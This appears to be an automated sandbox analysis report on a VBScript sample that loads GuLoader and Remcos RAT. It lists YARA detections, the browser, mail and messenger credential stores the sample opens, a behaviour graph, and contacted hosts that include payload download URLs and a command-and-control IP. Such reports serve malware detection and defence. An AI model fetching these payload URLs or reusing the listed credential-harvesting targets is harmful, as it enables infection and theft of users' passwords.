Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24572264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 17_2_24572264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 23_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0041739B GetVersionExW, 20_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 23_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 23_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 23_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I Jump to behavior
Yara detected Remcos RAT
Source: Yara match File source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465863 Sample: SOA.vbs Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 42 geoplugin.net 2->42 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Yara detected GuLoader 2->58 60 10 other signatures 2->60 10 wscript.exe 1 2->10         started        signatures3 process4 signatures5 62 VBScript performs obfuscated calls to suspicious functions 10->62 64 Suspicious powershell command line found 10->64 66 Wscript starts Powershell (via cmd or directly) 10->66 68 3 other signatures 10->68 13 powershell.exe 14 19 10->13         started        process6 dnsIp7 48 103.237.86.247, 49700, 49707, 80 BGNR-AP2BainandCompanySG unknown 13->48 76 Suspicious powershell command line found 13->76 78 Obfuscated command line found 13->78 80 Very long command line found 13->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 13->82 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures8 process9 signatures10 50 Writes to foreign memory regions 17->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 17->52 24 wab.exe 3 15 17->24         started        29 cmd.exe 1 17->29         started        process11 dnsIp12 44 103.237.87.32, 1999, 49708, 49709 BGNR-AP2BainandCompanySG unknown 24->44 46 geoplugin.net 178.237.33.50, 49710, 80 ATOM86-ASATOM86NL Netherlands 24->46 40 C:\ProgramData\remcos\logs.dat, data 24->40 dropped 70 Detected Remcos RAT 24->70 72 Maps a DLL or memory area into another process 24->72 74 Installs a global keyboard hook 24->74 31 wab.exe 1 24->31         started        34 wab.exe 1 24->34         started        36 wab.exe 2 24->36         started        38 2 other processes 24->38 file13 signatures14 process15 signatures16 84 Tries to steal Instant Messenger accounts or passwords 31->84 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 34->88
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false
103.237.86.247
 unknown unknown
133587 BGNR-AP2BainandCompanySG false
103.237.87.32
 unknown unknown
133587 BGNR-AP2BainandCompanySG true

Contacted Domains

Name IP Active
geoplugin.net 178.237.33.50 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://103.237.86.247/mbLXhRfFSSN77.bin false
  • Avira URL Cloud: safe
 unknown
103.237.87.32 true
  • Avira URL Cloud: safe
 unknown
http://geoplugin.net/json.gp false
  • URL Reputation: safe
 unknown
http://103.237.86.247/Teentsier.lpk false
  • Avira URL Cloud: safe
 unknown